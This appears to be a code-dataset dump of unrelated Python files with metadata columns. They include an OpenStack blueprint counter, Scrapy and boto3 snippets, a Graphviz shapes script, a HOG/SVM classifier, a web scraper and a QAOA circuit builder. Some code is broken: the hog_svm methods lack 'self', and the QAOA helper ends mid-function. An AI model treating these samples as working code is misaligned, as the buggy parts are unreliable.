cwd = os.getcwd()
approved_dir = os.path.join(cwd, 'specs', release, 'approved')
approved_specs = os.listdir(approved_dir)
template_file = '%s-template.rst' % release
for spec_fname in sorted(approved_specs):
# get the blueprint name, it should be the name of the rst file
if not spec_fname.endswith('.rst'):
continue
# check for the template file and skip that
if spec_fname == template_file:
continue
bp_name = spec_fname.split('.rst')[0]
if bp_name in unapproved_blueprint_names:
print('WARNING: Blueprint for spec %s needs approval.' %
spec_fname)
def main():
opts = get_options()
count_blueprints(opts.release)
if __name__ == '__main__':
main()
| #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import os
import lib
def get_options():
parser = argparse.ArgumentParser(
description='Count blueprints for a given release. Requires '
'launchpadlib to be installed.')
parser.add_argument('release', help='The release to process.',
choices=lib.get_releases())
return parser.parse_args()
def count_blueprints(release):
lp_nova = lib.get_lp_nova('count-specs')
# Valid specifications are specifications that are not obsolete.
blueprints = lp_nova.getSeries(name=release).valid_specifications
targeted = len(blueprints)
approved = 0
implemented = 0
unapproved_blueprint_names = set()
for blueprint in blueprints:
if blueprint.definition_status == 'Approved':
approved += 1
else:
unapproved_blueprint_names.add(blueprint.name)
if blueprint.implementation_status == 'Implemented':
implemented += 1
print('')
print('Summary')
print('-------')
print('Number of Targeted blueprints: %d' % targeted)
print('Number of Approved blueprints: %d' % approved)
print('Number of Implemented blueprints: %d' % implemented)
# Check for approved specs whose blueprints have not been approved
cwd = os.getcwd()
approved_dir = os.path.join(cwd, 'specs', release, 'approved')
approved_specs = os.listdir(approved_dir)
template_file = '%s-template.rst' % release
for spec_fname in sorted(approved_specs):
# get the blueprint name, it should be the name of the rst file
if not spec_fname.endswith('.rst'):
continue
# check for the template file and skip that
if spec_fname == template_file:
continue
bp_name = spec_fname.split('.rst')[0]
if bp_name in unapproved_blueprint_names:
print('WARNING: Blueprint for spec %s needs approval.' %
spec_fname)
def main():
opts = get_options()
count_blueprints(opts.release)
if __name__ == '__main__':
main()
| en | 0.867795 | #!/usr/bin/env python # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # Valid specifications are specifications that are not obsolete. # Check for approved specs whose blueprints have not been approved # get the blueprint name, it should be the name of the rst file # check for the template file and skip that | 2.628018 | 3 |
tests/__init__.py | ludwiglierhammer/index_calculator | 0 | 6617393 | <filename>tests/__init__.py
"""Unit test package for index_calculator."""
| <filename>tests/__init__.py
"""Unit test package for index_calculator."""
| en | 0.640701 | Unit test package for index_calculator. | 1.227488 | 1 |
scrapy_proxy_crawler/pipelines.py | DengZuoheng/scrapy_proxy_crawler | 0 | 6617394 | <reponame>DengZuoheng/scrapy_proxy_crawler<gh_stars>0
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy_proxy_crawler.items import *
class ScrapyProxyCrawlerPipeline(object):
def process_item(self, item, spider):
if isinstance(item, ProxyItem):
spider.logger.info("Accepted proxy: %s" % item['addr'])
return item | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy_proxy_crawler.items import *
class ScrapyProxyCrawlerPipeline(object):
def process_item(self, item, spider):
if isinstance(item, ProxyItem):
spider.logger.info("Accepted proxy: %s" % item['addr'])
return item | en | 0.663433 | # -*- coding: utf-8 -*- # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html | 2.042523 | 2 |
boto3_type_annotations/boto3_type_annotations/rekognition/paginator.py | cowboygneox/boto3_type_annotations | 119 | 6617395 | <filename>boto3_type_annotations/boto3_type_annotations/rekognition/paginator.py
from typing import Dict
from botocore.paginate import Paginator
class ListCollections(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
pass
class ListFaces(Paginator):
def paginate(self, CollectionId: str, PaginationConfig: Dict = None) -> Dict:
pass
class ListStreamProcessors(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
pass
| <filename>boto3_type_annotations/boto3_type_annotations/rekognition/paginator.py
from typing import Dict
from botocore.paginate import Paginator
class ListCollections(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
pass
class ListFaces(Paginator):
def paginate(self, CollectionId: str, PaginationConfig: Dict = None) -> Dict:
pass
class ListStreamProcessors(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
pass
| none | 1 | 2.204705 | 2 | |
2.py | syheliel/CyberBattleSim-1 | 0 | 6617396 | from diagrams import Diagram, Node,Edge
from diagrams.custom import Custom
shapes = [
"box","polygon","ellipse","oval","circle",
"point","egg","triangle","plaintext","plain",
"diamond","trapezium","parallelogram","house","pentagon",
"hexagon","septagon","octagon","doublecircle","doubleoctagon",
"Mdiamond","Msquare","Mcircle",
"rect","rectangle","square","star","none","underline","cylinder",
"tripleoctagon","invtriangle","invtrapezium","invhouse",
"note","tab","folder","box3d","component","promoter",
"cds","terminator","utr","primersite","restrictionsite",
"fivepoverhang","threepoverhang","noverhang","assembly",
"signature","insulator","ribosite","rnastab","proteasesite",
"proteinstab","rpromoter","rarrow","larrow","lpromoter", ]
num_shapes = len(shapes)
shapes_per_row = 5
num_of_rows = int(num_shapes / shapes_per_row) + (num_shapes % shapes_per_row > 0)
with Diagram("\n\nUsing Graphviz Shapes") as diag:
for row in range(num_of_rows)[::-1]:
items_in_row = shapes_per_row - (row+1) * shapes_per_row // num_shapes
shapes_i = row * shapes_per_row
node_list = [
'Node('
f'shape="{shapes[shapes_i+item_num]}", '
f'label="\\n"+"{shapes[shapes_i+item_num]}", '
'labelloc="t", '
'style="solid") - Edge(penwidth="0.0")'
for item_num in range(items_in_row)[:-1]
] + ['Node('
f'shape="{shapes[shapes_i+items_in_row-1]}", '
f'label="\\n"+"{shapes[shapes_i+items_in_row-1]}", '
'labelloc="t", '
'style="solid")']
node_row = "-".join(node_list)
print(len(node_list))
eval(node_row)
diag
| from diagrams import Diagram, Node,Edge
from diagrams.custom import Custom
shapes = [
"box","polygon","ellipse","oval","circle",
"point","egg","triangle","plaintext","plain",
"diamond","trapezium","parallelogram","house","pentagon",
"hexagon","septagon","octagon","doublecircle","doubleoctagon",
"Mdiamond","Msquare","Mcircle",
"rect","rectangle","square","star","none","underline","cylinder",
"tripleoctagon","invtriangle","invtrapezium","invhouse",
"note","tab","folder","box3d","component","promoter",
"cds","terminator","utr","primersite","restrictionsite",
"fivepoverhang","threepoverhang","noverhang","assembly",
"signature","insulator","ribosite","rnastab","proteasesite",
"proteinstab","rpromoter","rarrow","larrow","lpromoter", ]
num_shapes = len(shapes)
shapes_per_row = 5
num_of_rows = int(num_shapes / shapes_per_row) + (num_shapes % shapes_per_row > 0)
with Diagram("\n\nUsing Graphviz Shapes") as diag:
for row in range(num_of_rows)[::-1]:
items_in_row = shapes_per_row - (row+1) * shapes_per_row // num_shapes
shapes_i = row * shapes_per_row
node_list = [
'Node('
f'shape="{shapes[shapes_i+item_num]}", '
f'label="\\n"+"{shapes[shapes_i+item_num]}", '
'labelloc="t", '
'style="solid") - Edge(penwidth="0.0")'
for item_num in range(items_in_row)[:-1]
] + ['Node('
f'shape="{shapes[shapes_i+items_in_row-1]}", '
f'label="\\n"+"{shapes[shapes_i+items_in_row-1]}", '
'labelloc="t", '
'style="solid")']
node_row = "-".join(node_list)
print(len(node_list))
eval(node_row)
diag
| none | 1 | 3.013172 | 3 | |
rectarea.py | roshanrobotics/python-program | 0 | 6617397 | class rect():
def __init__(self,width,length):
self.width=width
self.length=length
def area(self):
return self.width*self.length
a=int(input("Enter length of rectangle: "))
b=int(input("Enter width of rectangle: "))
obj=rect(a,b)
print("Area of rectangle:",obj.area())
| class rect():
def __init__(self,width,length):
self.width=width
self.length=length
def area(self):
return self.width*self.length
a=int(input("Enter length of rectangle: "))
b=int(input("Enter width of rectangle: "))
obj=rect(a,b)
print("Area of rectangle:",obj.area())
| none | 1 | 3.949383 | 4 | |
src/lecture1/hog_svm.py | Fassial/zju-intern | 1 | 6617398 | <reponame>Fassial/zju-intern
"""
Created on July 25 01:45, 2020
@author: fassial
"""
import math
import numpy as np
from sklearn.svm import SVC
# local dep
import preprocess
class hog_svm:
def __init__(self):
self.svm = SVC(
C = 1.0
)
def train(x_train, y_train, batch_size = 100):
n_cycle = math.ceil(x_train.shape[0] / batch_size)
print("training...")
for i in range(n_cycle):
print("training..." + str(i) + "/" + str(n_cycle))
xi_train = x_train[i*batch_size:(i+1)*batch_size,:] if (i+1)*batch_size <= x_train.shape[0] else x_train[i*batch_size:,:]
yi_train = y_train[i*batch_size:(i+1)*batch_size] if (i+1)*batch_size <= y_train.shape[0] else y_train[i*batch_size:]
self.svm.fit(xi_train, yi_train)
def score(x_test, y_test, batch_size = 100):
score = 0
n_cycle = math.ceil(x_test.shape[0] / batch_size)
print("testing...")
for i in range(n_cycle):
print("testing..." + str(i) + "/" + str(n_cycle))
xi_test = x_test[i*batch_size:(i+1)*batch_size,:] if (i+1)*batch_size <= x_test.shape[0] else x_test[i*batch_size:,:]
yi_test = y_test[i*batch_size:(i+1)*batch_size] if (i+1)*batch_size <= y_test.shape[0] else y_test[i*batch_size:]
score += self.svm.score(xi_test, yi_test) * xi_test.shape[0]
score /= x_test.shape[0]
return score
if __name__ == "__main__":
hog_svm_inst = hog_svm()
x_train, y_train, x_test, y_test = preprocess.load_data()
hog_svm_inst.train(x_train, y_train)
score = hog_svm_inst.score(x_test, y_test)
print("score: " + str(score))
| """
Created on July 25 01:45, 2020
@author: fassial
"""
import math
import numpy as np
from sklearn.svm import SVC
# local dep
import preprocess
class hog_svm:
def __init__(self):
self.svm = SVC(
C = 1.0
)
def train(x_train, y_train, batch_size = 100):
n_cycle = math.ceil(x_train.shape[0] / batch_size)
print("training...")
for i in range(n_cycle):
print("training..." + str(i) + "/" + str(n_cycle))
xi_train = x_train[i*batch_size:(i+1)*batch_size,:] if (i+1)*batch_size <= x_train.shape[0] else x_train[i*batch_size:,:]
yi_train = y_train[i*batch_size:(i+1)*batch_size] if (i+1)*batch_size <= y_train.shape[0] else y_train[i*batch_size:]
self.svm.fit(xi_train, yi_train)
def score(x_test, y_test, batch_size = 100):
score = 0
n_cycle = math.ceil(x_test.shape[0] / batch_size)
print("testing...")
for i in range(n_cycle):
print("testing..." + str(i) + "/" + str(n_cycle))
xi_test = x_test[i*batch_size:(i+1)*batch_size,:] if (i+1)*batch_size <= x_test.shape[0] else x_test[i*batch_size:,:]
yi_test = y_test[i*batch_size:(i+1)*batch_size] if (i+1)*batch_size <= y_test.shape[0] else y_test[i*batch_size:]
score += self.svm.score(xi_test, yi_test) * xi_test.shape[0]
score /= x_test.shape[0]
return score
if __name__ == "__main__":
hog_svm_inst = hog_svm()
x_train, y_train, x_test, y_test = preprocess.load_data()
hog_svm_inst.train(x_train, y_train)
score = hog_svm_inst.score(x_test, y_test)
print("score: " + str(score)) | en | 0.873684 | Created on July 25 01:45, 2020 @author: fassial # local dep | 2.711082 | 3 |
986_interval_list_intersect.py | ojhaanshu87/LeetCode | 0 | 6617399 | <filename>986_interval_list_intersect.py
"""
Given two lists of closed intervals, each list of intervals is pairwise disjoint and in sorted order.
Return the intersection of these two interval lists.
(Formally, a closed interval [a, b] (with a <= b) denotes the set of real numbers x with a <= x <= b.
The intersection of two closed intervals is a set of real numbers that is either empty, or can be represented as a closed interval.
For example, the intersection of [1, 3] and [2, 4] is [2, 3].)
Input: A = [[0,2],[5,10],[13,23],[24,25]], B = [[1,5],[8,12],[15,24],[25,26]]
Output: [[1,2],[5,5],[8,10],[15,23],[24,24],[25,25]]
Note:
0 <= A.length < 1000
0 <= B.length < 1000
0 <= A[i].start, A[i].end, B[i].start, B[i].end < 10^9
"""
#ALGORITHM
#If A[0] has the smallest endpoint, it can only intersect B[0]. After, we can discard A[0] since it cannot intersect anything else.
#Similarly, if B[0] has the smallest endpoint, it can only intersect A[0], and we can discard B[0] after since it cannot intersect anything else.
#We use two pointers, i and j, to virtually manage "discarding" A[0] or B[0] repeatedly.
#Time Complexity: O(M + N)O(M+N), where M, NM,N are the lengths of A and B respectively.
#Space Complexity: O(M + N)O(M+N), the maximum size of the answer.
class Solution(object):
def intervalIntersection(self, A, B):
res, ptr_a, ptr_b = [], 0, 0
while ptr_a < len(A) and ptr_b < len(B):
start = max(A[ptr_a][0], B[ptr_b][0])
end = min(A[ptr_a][1], B[ptr_b][1])
if start <= end:
res.append([start, end])
#remove interval with smallest endpoint
if A[ptr_a][1] < B[ptr_b][1]:
ptr_a += 1
else:
ptr_b += 1
return res
| <filename>986_interval_list_intersect.py
"""
Given two lists of closed intervals, each list of intervals is pairwise disjoint and in sorted order.
Return the intersection of these two interval lists.
(Formally, a closed interval [a, b] (with a <= b) denotes the set of real numbers x with a <= x <= b.
The intersection of two closed intervals is a set of real numbers that is either empty, or can be represented as a closed interval.
For example, the intersection of [1, 3] and [2, 4] is [2, 3].)
Input: A = [[0,2],[5,10],[13,23],[24,25]], B = [[1,5],[8,12],[15,24],[25,26]]
Output: [[1,2],[5,5],[8,10],[15,23],[24,24],[25,25]]
Note:
0 <= A.length < 1000
0 <= B.length < 1000
0 <= A[i].start, A[i].end, B[i].start, B[i].end < 10^9
"""
#ALGORITHM
#If A[0] has the smallest endpoint, it can only intersect B[0]. After, we can discard A[0] since it cannot intersect anything else.
#Similarly, if B[0] has the smallest endpoint, it can only intersect A[0], and we can discard B[0] after since it cannot intersect anything else.
#We use two pointers, i and j, to virtually manage "discarding" A[0] or B[0] repeatedly.
#Time Complexity: O(M + N)O(M+N), where M, NM,N are the lengths of A and B respectively.
#Space Complexity: O(M + N)O(M+N), the maximum size of the answer.
class Solution(object):
def intervalIntersection(self, A, B):
res, ptr_a, ptr_b = [], 0, 0
while ptr_a < len(A) and ptr_b < len(B):
start = max(A[ptr_a][0], B[ptr_b][0])
end = min(A[ptr_a][1], B[ptr_b][1])
if start <= end:
res.append([start, end])
#remove interval with smallest endpoint
if A[ptr_a][1] < B[ptr_b][1]:
ptr_a += 1
else:
ptr_b += 1
return res
| en | 0.901523 | Given two lists of closed intervals, each list of intervals is pairwise disjoint and in sorted order. Return the intersection of these two interval lists. (Formally, a closed interval [a, b] (with a <= b) denotes the set of real numbers x with a <= x <= b. The intersection of two closed intervals is a set of real numbers that is either empty, or can be represented as a closed interval. For example, the intersection of [1, 3] and [2, 4] is [2, 3].) Input: A = [[0,2],[5,10],[13,23],[24,25]], B = [[1,5],[8,12],[15,24],[25,26]] Output: [[1,2],[5,5],[8,10],[15,23],[24,24],[25,25]] Note: 0 <= A.length < 1000 0 <= B.length < 1000 0 <= A[i].start, A[i].end, B[i].start, B[i].end < 10^9 #ALGORITHM #If A[0] has the smallest endpoint, it can only intersect B[0]. After, we can discard A[0] since it cannot intersect anything else. #Similarly, if B[0] has the smallest endpoint, it can only intersect A[0], and we can discard B[0] after since it cannot intersect anything else. #We use two pointers, i and j, to virtually manage "discarding" A[0] or B[0] repeatedly. #Time Complexity: O(M + N)O(M+N), where M, NM,N are the lengths of A and B respectively. #Space Complexity: O(M + N)O(M+N), the maximum size of the answer. #remove interval with smallest endpoint | 3.895559 | 4 |
chapter5/beautifulsoup_csv.py | mysodalife/spider_program | 3 | 6617400 | # -*- coding: utf-8 -*-
# @Time : 2018/10/12 11:37
# @Author : sodalife
# @File : beautifulsoup_csv.py
# @Description : csv 文件来存储
import csv
import requests
import chardet
import re
from lxml import etree
User_Agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'
headers = {'User-Agent': User_Agent}
response = requests.get('http://seputu.com', headers=headers)
response.encoding = chardet.detect(response.content)['encoding']
html = etree.HTML(response.text)
mulus = html.xpath('.//div[@class="mulu"]')
pattern = re.compile(r'\s*\[(.*)\]\s+(.*)')
rows = []
for mulu in mulus:
h2_text = mulu.xpath('.//h2/text()')
if len(h2_text) > 0:
title = h2_text[0]
print(title.encode('utf-8'))
a_s = mulu.xpath('./div[@class="box"]/ul/li/a')
for a in a_s:
href = a.xpath('./@href')[0]
box_title = a.xpath('./@title')[0]
match = re.search(pattern, box_title)
if match is not None:
date = match.group(1) # bytes 转 str
real_title = match.group(2)
content = [title, real_title, href, date]
rows.append(content)
headers = ['title', 'read_title', 'href', 'date']
with open('qiye.csv', 'w', newline='') as f:
f_csv = csv.writer(f)
f_csv.writerow(headers)
f_csv.writerows(rows)
| # -*- coding: utf-8 -*-
# @Time : 2018/10/12 11:37
# @Author : sodalife
# @File : beautifulsoup_csv.py
# @Description : csv 文件来存储
import csv
import requests
import chardet
import re
from lxml import etree
User_Agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'
headers = {'User-Agent': User_Agent}
response = requests.get('http://seputu.com', headers=headers)
response.encoding = chardet.detect(response.content)['encoding']
html = etree.HTML(response.text)
mulus = html.xpath('.//div[@class="mulu"]')
pattern = re.compile(r'\s*\[(.*)\]\s+(.*)')
rows = []
for mulu in mulus:
h2_text = mulu.xpath('.//h2/text()')
if len(h2_text) > 0:
title = h2_text[0]
print(title.encode('utf-8'))
a_s = mulu.xpath('./div[@class="box"]/ul/li/a')
for a in a_s:
href = a.xpath('./@href')[0]
box_title = a.xpath('./@title')[0]
match = re.search(pattern, box_title)
if match is not None:
date = match.group(1) # bytes 转 str
real_title = match.group(2)
content = [title, real_title, href, date]
rows.append(content)
headers = ['title', 'read_title', 'href', 'date']
with open('qiye.csv', 'w', newline='') as f:
f_csv = csv.writer(f)
f_csv.writerow(headers)
f_csv.writerows(rows)
| en | 0.262871 | # -*- coding: utf-8 -*- # @Time : 2018/10/12 11:37 # @Author : sodalife # @File : beautifulsoup_csv.py # @Description : csv 文件来存储 # bytes 转 str | 3.061314 | 3 |
qaoa_vrp/build_circuit.py | vivekkatial/HAQC | 1 | 6617401 | import base64
import uuid
from collections import defaultdict
from itertools import count
import networkx as nx
import numpy as np
from qiskit import Aer, execute
from qiskit.providers.aer import QasmSimulator
from qiskit.aqua import QuantumInstance, aqua_globals
from qiskit.aqua.algorithms import QAOA, NumPyMinimumEigensolver
from qiskit.aqua.components.optimizers import ADAM, AQGD, COBYLA, NELDER_MEAD
from qiskit.circuit import Parameter
from qiskit.finance.applications.ising import portfolio
from qiskit.optimization import QuadraticProgram
from qiskit.optimization.converters import QuadraticProgramToQubo
from qiskit.optimization.algorithms import (
MinimumEigenOptimizer,
RecursiveMinimumEigenOptimizer,
)
def build_qubos(clusters, depot_info, A=30):
    """Build one QUBO per cluster for the intra-cluster TSP subproblems.

    Each cluster is encoded as a time-indexed TSP: binary variable
    ``X<node><t>`` is 1 when the vehicle is at ``node`` at timestep ``t``
    (t = 1 .. no_nodes - 1). The depot is implicit at the start and end of
    the tour and gets no variables. Travel costs appear as linear terms
    (depot legs, active at the first and last timestep) and quadratic terms
    (legs between consecutive timesteps); missing edges are discouraged with
    the penalty ``A``. Visit-once and one-node-per-timestep equality
    constraints are then converted to penalty form by
    ``QuadraticProgramToQubo``.

    Args:
        clusters: mapping of cluster keys to networkx graphs, each holding
            one cluster of customer nodes plus the depot.
        depot_info (dict): depot information; only ``depot_info["id"]`` is
            used here.
        A (int): penalty weight for infeasible assignments (default 30,
            following Feld et al.).

    Returns:
        list: one qiskit QUBO (``QuadraticProgram``) per cluster.
    """
    depot_id = depot_info["id"]
    qubos = []
    for subgraph in clusters:
        cluster = clusters[subgraph]
        constrained_qp = QuadraticProgram()
        no_nodes = len(cluster.nodes)
        no_timesteps = no_nodes - 1  # every node except the depot
        # One binary variable per (customer node, timestep) pair, registered
        # node-major so the variable ordering matches the constraint names.
        for node in cluster.nodes:
            if node == depot_id:
                continue
            for t in range(1, no_timesteps + 1):
                constrained_qp.binary_var("X" + str(node) + str(t))
        # Objective coefficients.
        linear = {}
        quadratic = {}
        for edge in cluster.edges:
            cost = cluster[edge[0]][edge[1]]["cost"]
            if edge[0] == depot_id or edge[1] == depot_id:
                # Depot legs: linear cost for starting (t=1) or finishing
                # (t=no_timesteps) the tour at the adjacent customer node.
                other = edge[1] if edge[0] == depot_id else edge[0]
                linear["X" + str(other) + str(1)] = cost
                linear["X" + str(other) + str(no_timesteps)] = cost
            else:
                # Customer-to-customer legs: quadratic cost for occupying the
                # two endpoints at consecutive timesteps, in both directions.
                for t in range(1, no_timesteps):
                    quadratic[
                        ("X" + str(edge[0]) + str(t), "X" + str(edge[1]) + str(t + 1))
                    ] = cost
                    quadratic[
                        ("X" + str(edge[1]) + str(t), "X" + str(edge[0]) + str(t + 1))
                    ] = cost
        # Penalties for legs that do not exist in the graph.
        for node in cluster.nodes:
            if node == depot_id:
                continue
            # Penalise starting or ending the tour at a node with no depot
            # edge. has_edge is orientation-insensitive on undirected graphs,
            # unlike the previous tuple lookup in a plain edge list which
            # missed reversed edge orientations.
            if not cluster.has_edge(depot_id, node):
                for t in (1, no_timesteps):
                    var = "X" + str(node) + str(t)
                    linear[var] = linear.get(var, 0) + A
            # Penalise consecutive visits between unconnected customer nodes,
            # in both travel directions. Each unordered pair is processed in
            # both (node, node2) orders, so each term accumulates 2*A in
            # total — matching the original accumulation.
            for node2 in cluster.nodes:
                if node2 == depot_id or node2 == node:
                    continue
                if cluster.has_edge(node, node2):
                    continue
                for t in range(1, no_timesteps):
                    for pairing in (
                        ("X" + str(node) + str(t), "X" + str(node2) + str(t + 1)),
                        ("X" + str(node2) + str(t), "X" + str(node) + str(t + 1)),
                    ):
                        quadratic[pairing] = quadratic.get(pairing, 0) + A
        constrained_qp.minimize(linear=linear, quadratic=quadratic)
        # Constraint: every customer node is visited exactly once.
        # NOTE(review): previously this constraint appeared to be emitted a
        # single time using a stale loop variable, constraining only one
        # node; a valid TSP encoding needs one such constraint per node.
        for node in cluster.nodes:
            if node == depot_id:
                continue
            node_constraint = {
                "X" + str(node) + str(t): 1 for t in range(1, no_timesteps + 1)
            }
            constrained_qp.linear_constraint(
                linear=node_constraint,
                sense="==",
                rhs=1,
                name="visit_node{}_once".format(node),
            )
        # Constraint: exactly one node is occupied at each timestep.
        for t in range(1, no_timesteps + 1):
            timestep_constraint = {
                "X" + str(node) + str(t): 1
                for node in cluster.nodes
                if node != depot_id
            }
            constrained_qp.linear_constraint(
                linear=timestep_constraint,
                sense="==",
                rhs=1,
                name="timestep{}_one_node".format(t),
            )
        # Fold the equality constraints into the objective as penalties.
        converter = QuadraticProgramToQubo(penalty=A)
        qubos.append(converter.convert(constrained_qp))
    return qubos
def solve_qubo_qaoa(qubo, p, backend, points=None):
    """Solve a QUBO both exactly and with QAOA.

    Args:
        qubo (object): qiskit QUBO (``QuadraticProgram``) to solve.
        p (int): number of QAOA layers (circuit depth parameter).
        backend (str): ``"statevector_simulator"`` or
            ``"matrix_product_state"``.
        points: unused; kept for backward compatibility with callers that
            pass an initial point.

    Returns:
        tuple: ``(qaoa_result, exact_result, offset, num_qubits)`` where
        ``offset`` is the constant energy term from the Ising conversion and
        ``num_qubits`` is read from the optimal QAOA circuit.
    """
    # Classical reference solution for later comparison with QAOA.
    exact_mes = NumPyMinimumEigensolver()
    exact = MinimumEigenOptimizer(exact_mes)
    exact_result = exact.solve(qubo)
    # The Ising conversion is only needed here for the constant offset.
    op, offset = qubo.to_ising()
    if backend == "statevector_simulator":
        method = Aer.get_backend("statevector_simulator")
    elif backend == "matrix_product_state":
        method = QasmSimulator(method="matrix_product_state")
    num_qubits = qubo.get_num_vars()
    # Scale the shot budget with problem size. 2 ** sqrt(n) is a float, and
    # the shot count must be an integer, so cast explicitly (the original
    # expression passed a float to QuantumInstance).
    quantum_instance = QuantumInstance(
        method,
        shots=int((2 ** np.sqrt(num_qubits)) * 2048),
        seed_simulator=aqua_globals.random_seed,
        seed_transpiler=aqua_globals.random_seed,
    )
    # Random initial angles in [0, 2*pi) for the 2*p variational parameters.
    qaoa_meas = QAOA(
        quantum_instance=quantum_instance,
        p=p,
        initial_point=list(2 * np.pi * np.random.random(2 * p)),
    )
    qaoa = MinimumEigenOptimizer(qaoa_meas)
    qaoa_result = qaoa.solve(qubo)
    num_qubits = qaoa.min_eigen_solver.get_optimal_circuit().num_qubits
    return qaoa_result, exact_result, offset, num_qubits
def interp_point(optimal_point):
    """Interpolate a depth-p optimal point into a starting point for depth p+1.

    Implements the INTERP heuristic: the gamma and beta schedules are padded
    with zeros at both ends and neighbouring entries are linearly blended to
    produce p+1 values per schedule.

    Args:
        optimal_point: sequence of 2*p values, gammas followed by betas, from
            the previous layer's optimisation.

    Returns:
        list: 2*(p+1) values forming the informed next starting point.
    """
    params = list(optimal_point)
    p = len(params) // 2
    gammas = [0] + params[:p] + [0]
    betas = [0] + params[p : 2 * p] + [0]
    new_gammas = [
        gammas[i - 1] * (i - 1) / p + gammas[i] * (p + 1 - i) / p
        for i in range(1, p + 2)
    ]
    new_betas = [
        betas[i - 1] * (i - 1) / p + betas[i] * (p + 1 - i) / p
        for i in range(1, p + 2)
    ]
    return new_gammas + new_betas
def get_fourier_points(last_expectation_value, p):
    """Extend a depth-p parameter set to a starting point for depth p+1.

    Appends a zero to both the gamma half (first ``p`` entries) and the beta
    half (remaining entries) of the previous layer's optimal parameters, so
    the p-layer optimum is reused as the initial guess for p+1 layers.

    Args:
        last_expectation_value (sequence): optimal parameters from the
            previous layer; gammas in the first ``p`` entries, betas after.
        p (int): number of layers the given parameters correspond to.

    Returns:
        list: parameters of length ``len(last_expectation_value) + 2``.
    """
    # The original implementation printed the result here as a debugging
    # leftover; that side effect has been removed.
    return (
        list(last_expectation_value[:p]) + [0] + list(last_expectation_value[p:]) + [0]
    )
def index_to_selection(i, num_assets):
    """Convert a basis-state index into its binary selection vector.

    The integer ``i`` is rendered as a binary string, left-padded to
    ``num_assets`` characters, and read back-to-front so that qubit 0 maps
    to the first entry of the result (used by print_result).

    Args:
        i (int): index of the basis state.
        num_assets (int): number of qubits / binary decision variables.

    Returns:
        numpy.ndarray: 0/1 vector of length ``num_assets``.
    """
    bits = "{0:b}".format(i).rjust(num_assets)
    selection = [1 if bits[pos] == "1" else 0 for pos in reversed(range(num_assets))]
    return np.array(selection)
def print_result(qubo, qaoa_result, num_qubits, exact_value, backend):
    """Print measured basis states with their objective value and probability,
    and collect the states whose objective equals the known exact optimum.

    Args:
        qubo: qiskit QUBO whose objective is evaluated per basis state.
        qaoa_result: optimisation result returned by MinimumEigenOptimizer.
        num_qubits (int): number of qubits in the QAOA circuit.
        exact_value (float): objective value of the exact (classical) optimum.
        backend (str): "statevector_simulator" or "matrix_product_state";
            selects how probabilities are extracted from the eigenstate.

    Returns:
        tuple: (exact_probs, solution_data) — the probabilities of states
        attaining exact_value, and a dict mapping each such state's repr to
        its rank, energy and probability.
    """
    if backend == "statevector_simulator":
        # The eigenstate may be a raw ndarray or a state object that has to
        # be converted to a vector first.
        eigenvector = (
            qaoa_result.min_eigen_solver_result["eigenstate"]
            if isinstance(qaoa_result.min_eigen_solver_result["eigenstate"], np.ndarray)
            else qaoa_result.min_eigen_solver_result["eigenstate"].to_matrix()
        )
        probabilities = np.abs(eigenvector) ** 2
    elif backend == "matrix_product_state":
        probabilities = []
        # Counts-like mapping normalised by 1024.
        # NOTE(review): 1024 looks like a hard-coded shot count, but the
        # QuantumInstance is built with a different (size-dependent) number
        # of shots — confirm the normalisation is correct.
        for eigenstate in qaoa_result.min_eigen_solver_result["eigenstate"]:
            probabilities.append(
                qaoa_result.min_eigen_solver_result["eigenstate"][eigenstate] / 1024
            )
    # Iterate states from most to least probable.
    i_sorted = reversed(np.argsort(probabilities))
    print("----------------- Full result ---------------------")
    print("index\tselection\t\tvalue\t\tprobability")
    print("---------------------------------------------------")
    exact_probs = []
    solution_data = {}
    for index, i in enumerate(i_sorted):
        x = index_to_selection(i, num_qubits)
        probability = probabilities[i]
        # Always show the two most probable states.
        if index == 0 or index == 1:
            print(
                "%d\t%10s\t%.4f\t\t%.4f"
                % (index, x, qubo.objective.evaluate(x), probability)
            )
        # Record (and show) every state that attains the exact optimum.
        if qubo.objective.evaluate(x) == exact_value:
            print(
                "%d\t%10s\t%.4f\t\t%.4f"
                % (index, x, qubo.objective.evaluate(x), probability)
            )
            exact_probs.append(probability)
            solution_data[f"{x}"] = {
                "index": index,
                "energy": qubo.objective.evaluate(x),
                "probability": probability,
            }
    print("\n")
    return exact_probs, solution_data
def assign_parameters(circuit, params_expr, params):
    """Bind numeric values to a circuit's symbolic parameters.

    Args:
        circuit: parameterised quantum circuit to bind (any object exposing
            ``assign_parameters(mapping, inplace=...)``).
        params_expr (list): the circuit's Parameter objects, in order.
        params (list): numeric values, one per entry of ``params_expr``.

    Returns:
        A new circuit with every parameter bound; the input circuit is left
        untouched (``inplace=False``).
    """
    # Map each symbolic parameter onto its numeric value.
    binding = {params_expr[i]: params[i] for i in range(len(params))}
